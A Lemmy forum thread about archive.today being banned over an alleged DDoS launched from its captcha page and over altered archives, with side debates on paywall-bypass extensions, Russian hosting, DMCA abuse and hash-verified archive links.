- cross-posted to:
- [email protected]
- [email protected]
- cross-posted to:
- [email protected]
- [email protected]
How does the paywall circumvention of archive.today works?
As someone who uses Bypass Paywalls Clean, this is so frustrating.
Bypass Paywalls Clean was chased off of the Firefox Add-Ons site, chased off of Gitlab, and chased off of Github via DMCA takedown notices for copyright infringement. It is now hosted on the Russian Gitflic.ru.
We all know Russia sucks in a litany of ways, but one way it doesn’t suck is that it is one of the few countries left that has really thrown all caution to the wind and absolutely said “fuck it” in terms of respecting the international Big Copyright norms as promoted by and deeply influenced by the USA copyright cabal (RIAA/MPAA).
We have spent the better part of two decades dealing with the DMCA being used as an outright weapon to silence information that corporations and government find inconvenient mostly because that information is wildly incriminating for them. It works especially strongly because a large amount of the world’s internet has been consolidated to the US and its vast hosting structures like AWS and Cloudflare, putting enormous amounts of the internet under the direct influence of US laws like the DMCA.
Websites like Anna’s Archive, Libgen, and Sci-Hub live because they use hosting in countries that allow them to bypass these kind of restrictions. Russia is one of the most common countries for them to host the data out of due to the lack of enforcement of copyright laws, although it is obviously not the only country that these sites use.
Until we are able to alter international copyright protections to be reasonable instead of their current over-zealously and aggressively abusive nature, we will all suffer having to risk hosting of such sites in countries that are otherwise very unsavory to be associating with.
We live in the kind of world early piracy pioneers such as the original creators of The Pirate Bay were trying to fight from becoming a reality. The American copyright cabal fought tooth and nail to change Sweden’s interpretations of copyright law so they could send these men to prison.
Ironically, when Russia was joining the World Trade Organization in early 2010s, one requirement was for them to block pirate sites, namely torrent-sharing ones. Which they did, and the sites are blocked to this day.
Iirc that was also when the domain torrents.ru was taken away from what is now called RuTracker.
I’m with you on this, but let’s be careful here.
We all know Russia sucks in a litany of ways, but one way it doesn’t suck is that it is one of the few countries left that has really thrown all caution to the wind and absolutely said “fuck it” in terms of respecting the international Big Copyright norms as promoted by and deeply influenced by the USA copyright cabal (RIAA/MPAA).
I once made a YouTube video which somehow included a clip from some RT Russian TV bullshit show. (The show was in fact a direct ripoff of Gordon Ramsey’s Hell Kitchen, for which I’m sure they did not get license for.)
Some fucking Russian troll bots then DMCA’d my YouTube video, for using their clip, even though it was clearly “fair use” in US jurisdiction, and YouTube happily sucked their russian dicks and flagged and removed my video.
And my video had probably 15 views, like it wasn’t a big thing.
So they aren’t exactly the Robin Hood of free speech.
Not sure how this says anything about Russian copyright laws or Russian government.
Of course they aren’t, they will happily block information that they dislike because it’s embarrassing and incriminating to them. Skepticism should cut both ways, skeptical of those who use Russian connection to delegitimize valuable tools and the people associated with them, and skepticism of why Russia allows those things to persist providing they impact Western countries but not Russia.
Until the Western copyright situation is amended to something reasonable, we have to be skeptical in all aspects of this situation. I’d rather copyright was a reasonable length with reasonable policies so organizations didn’t have to resort to connections with Russia. In the meantime we have to work with the situation we have.
Is your comment in the thread about Wikipedia banning archive.today?
edit: I realised by reading other comments that many used archive.today to bypass paywalls, aside from the archival purpose Wikipedia relied on.
Original post title was:
Until further notice: archive.today/archive.is/archive.ph/… is banned from this community for apparently being a Russian DDOS tool
And linked to the /c/ukraine community which posted it.
Also, from the Ars story:
Patokallio wasn’t able to determine who runs Archive.today but mentioned apparent aliases such as “Denis Petrov” and “Masha Rabinovich,” and described evidence that the site is operated by someone from Russia.
The reason it matters:
It makes people suspect of anything hosted in Russia, which is frustrating because there’s a lot of valuable shit hosted there by people who are not necessarily from there, such as Alexandra Elbakyan founder of Sci-Hub, who has had many accusations tossed her way due to her websites association with Russia:
In December 2019, The Washington Post reported that Elbakyan was under investigation by the US Justice Department for suspected ties to Russia’s military intelligence arm, the GRU, to steal U.S. military secrets from defense contractors. Elbakyan has denied this, saying that Sci-Hub “is not in any way directly affiliated with Russian or some other country’s intelligence,” but noting that “of course, there could be some indirect help. The same as with donations, anyone can send them; they are completely anonymous, so I do not know who exactly is donating to Sci-Hub. There could be some help that I’m simply unaware of. I can only add that I write all of Sci-Hub code and design myself and I’m doing the server’s configuration.”
We cannot take for granted that one of the reasons we have access to a large amount of archived information on the internet is often because of unsavory countries who refuse to play by the US governments copyright rules.
We also cannot take for granted how connections with those countries are used to delegitimize people providing valuable services. Bypass Paywalls Clean in particular has had a litany of people assume it’s untrustworthy because of its current hosting situation because they don’t know the history of it and how it’s been kicked off of every other public repository that was stateside.
The archive.today person fucked things up and gave people more ammunition to claim that anything and everything associated with Russian internet is untrustworthy.
I don’t see as relevant a possible connection of archive.today to someone based in Russia.
The only facts that should be relevant are that the manager of it is an egomaniac, andcannot be trusted.
hey thanks, i had never heard of that bypass paywalls firefox addon
There’s also a version for Chrome if you swing that way.
I do not because I don’t like ads on Youtube, but thx.
For anyone curious, I looked into the DDOSing, and what was done is a simple string of JavaScript was added to archive[.]today that made a background request to the blog with a randomly generated search parameter. Every time someone looked at an archive, they unknowingly sent a request to the blog under attack.
Good reminder to donate to web.archive.org
While archive.org is good and more trustworthy than archive.is, it isn’t as useful for bypassing paywalls.
I do hope this move results in more support for the IA/Wayback Machine and helps them to update some of their crawler tech — thanks to the rise of AI, some sites are effectively (thru captchas etc.) or actively (through straight-up greed [coughRedditcough]) blocked from being archived almost entirely, which is frustrating for legit archivists/contributors.
If this is not an announcement, Lemmy lets you edit your post titles so you can correct that mistake instead of luring in people who think lemmy.world is also banning links using archive.today.
I’m not speculating on your intent, only pointing out that you can correct this situation instead of apologizing after the fact.
This is understandable, but at the same time, none of the anti-paywall lists are as good as archive.today. They actually have paid accounts at a bunch of paywalled sites, and use them when scraping.
Unfortunately, they’ve allegedly modified the contents of some archived articles, so even though they may do better to archive, nothing archived is of any value because it cannot be trusted.
What if somebody used archive.today to bypass a paywall and then archived that using Web Archive? (So we’re sure the content stays the same)
They’re injecting data into the sites during archive so that wouldn’t work.

I’ve switched to .md when the community mentioned something was up with the .today domain. Hopefully that one isn’t compromised.
It’s the same person running all of them, so yeah it is.
Damn.
URL
archive[.]today
archive[.]fo
archive[.]is
archive[.]li
archive[.]md
archive[.]ph
archive[.]vn
archiveiya74codqgiixo33q62qlrqtkgmcitqx5u2oeqnmn5bpcbiyd[.]onion

https://lemmy.world/c/ukraine was where i saw this. i didn’t write it. thought lemmy would have linked to the original, was wrong. FYI
Democracy died in daylight, the darkness hides the rotten body.
Everyone seems to be ignoring the fact that he only did this in response to a malicious dox attempt.
Who cares why they did it?
It proves they can and do alter the “archived” website, so it’s usefulness as a source is completely gone.
Yeah, ESH. His response of editing an archive showed the site to be unreliable as an archive. DDOSing from the site as a counter to the dox attempt caused the site serious reputational harm as well.
It sucks because his site was actually more reliable than The Internet Archive.
He only modified archived pages in response to a dox attempt?
And the thing is, the discovery of the modified pages revealed that it wasn’t even the first time he’d modified pages. And he used a real person’s identity to try and shift blame.
Irrespective of the doxxing allegations, if he’s done all this multiple times already, it means the page archives can’t be trusted AND there’s no guarantee that anything archived with the service will be available tomorrow.
Seems like we need to switch to URLs that contain the SHA256 of the page they’re linking to, so we can tell if anything has changed since the link was created.
Actually a pretty good idea.
Only works for archived pages though, because for any regular page, a large portion of the page will be dynamically generated; hashing the HTML will only say the framework hasn’t changed.
You would need a way of verifying that the SHA256 is a true copy of the site at the time though and not a faked page. You could do something like have a distributed network of archives that coordinate archival at the same time and then using the SHA256 then be able to see which archives fetched exactly the same page at the same time through some search functionality. I mean if addons are already being used for doing the crawling then we may be mostly there already since said addons would just need to certify their archive and after that they can discard the actual copy of the page. You need need a way to validate those workers though since a bad actor could just run a whole bunch at the same time to legitimise a fake archival.
The idea is to verify the archival copy’s URL, not to verify the original content. So yes, a server could push different content to the archiver than to people, or vary by region, or an AitM could modify the content as it goes out to the archiver. But adding the sha256 in the URL query parameter means that if someone publishes a link to an archive copy online, anyone else using the link can know they’re looking at the same content the other person was referencing.
If the archive content changes, that URL will be invalid; if someone uses a fake hash, the URL will be invalid (which is why MD5 wouldn’t be appropriate).
The beauty of this technique is that query parameters are generally ignored if unsupported by the web server, so any archival service could start using this technique today, and all it would require is a browser extension to validate the parameter.
Link it to something like Web of Trust, and you’ve solved the separate issue you described.
In fact, this is a feature WoT could add to their extension today, and it would “Just Work”. For that matter, Archive.org could add it to their extension today, too.
Remind me to ping Jason about that.
Seems like we need to switch to URLs that contain the SHA256 of the page they’re linking to, so we can tell if anything has changed since the link was created.
IPFS says hi
Yes; the problem IPFS has is the same problem IPv6 has.
The hash-in-a-URL solution can function cleanly in the background on top of what people already use.
Unfortunately, they shot themselves in the foot by responding the way they did. They basically did the job of anyone who wants them taken down and not trusted. It was probably the worst way they could have reacted. Such a tragedy to lose such a valuable website.
It wasn’t a dox attempt though. The blog just collected information that was already publicly available on other sites.
As they should since it doesn’t matter.
Yeah, someone being shitty to you doesn’t mean go you full-fledged shitty in return, it kind of proves your lack of trustworthiness to begin with. It’s like Nazis being like “leftists were mean to me by explaining how my politics made me a Nazi, so I’m gonna show them by Nazi-ing even harder! They forced me to be like this!” It kind of betrays the argument that the reason you got that way was because leftists were mean to you.
Bro any archiving/scraping tool can be used for ddos u just tell it to archive the same site over and over and now u have a different IP spamming the endpoint
In this case, their CAPTCHA page intentionally included code to DoS a particular blog, sending a request to search for a random string every 300ms (search is very CPU-intensive). This was regardless of the archived site you were trying to view.
Any good archiver will check for an archived copy before making a request, and batch requests. This was very different than the attack you’re imagining — if you opened any archive.today page, it would poll a developer’s personal blog, regardless of whether you were interacting with content from that blog.
don’t know all the details. fyi basically. i forget where i saw the same site mentioned for the same thing. don’t call me bro Bro












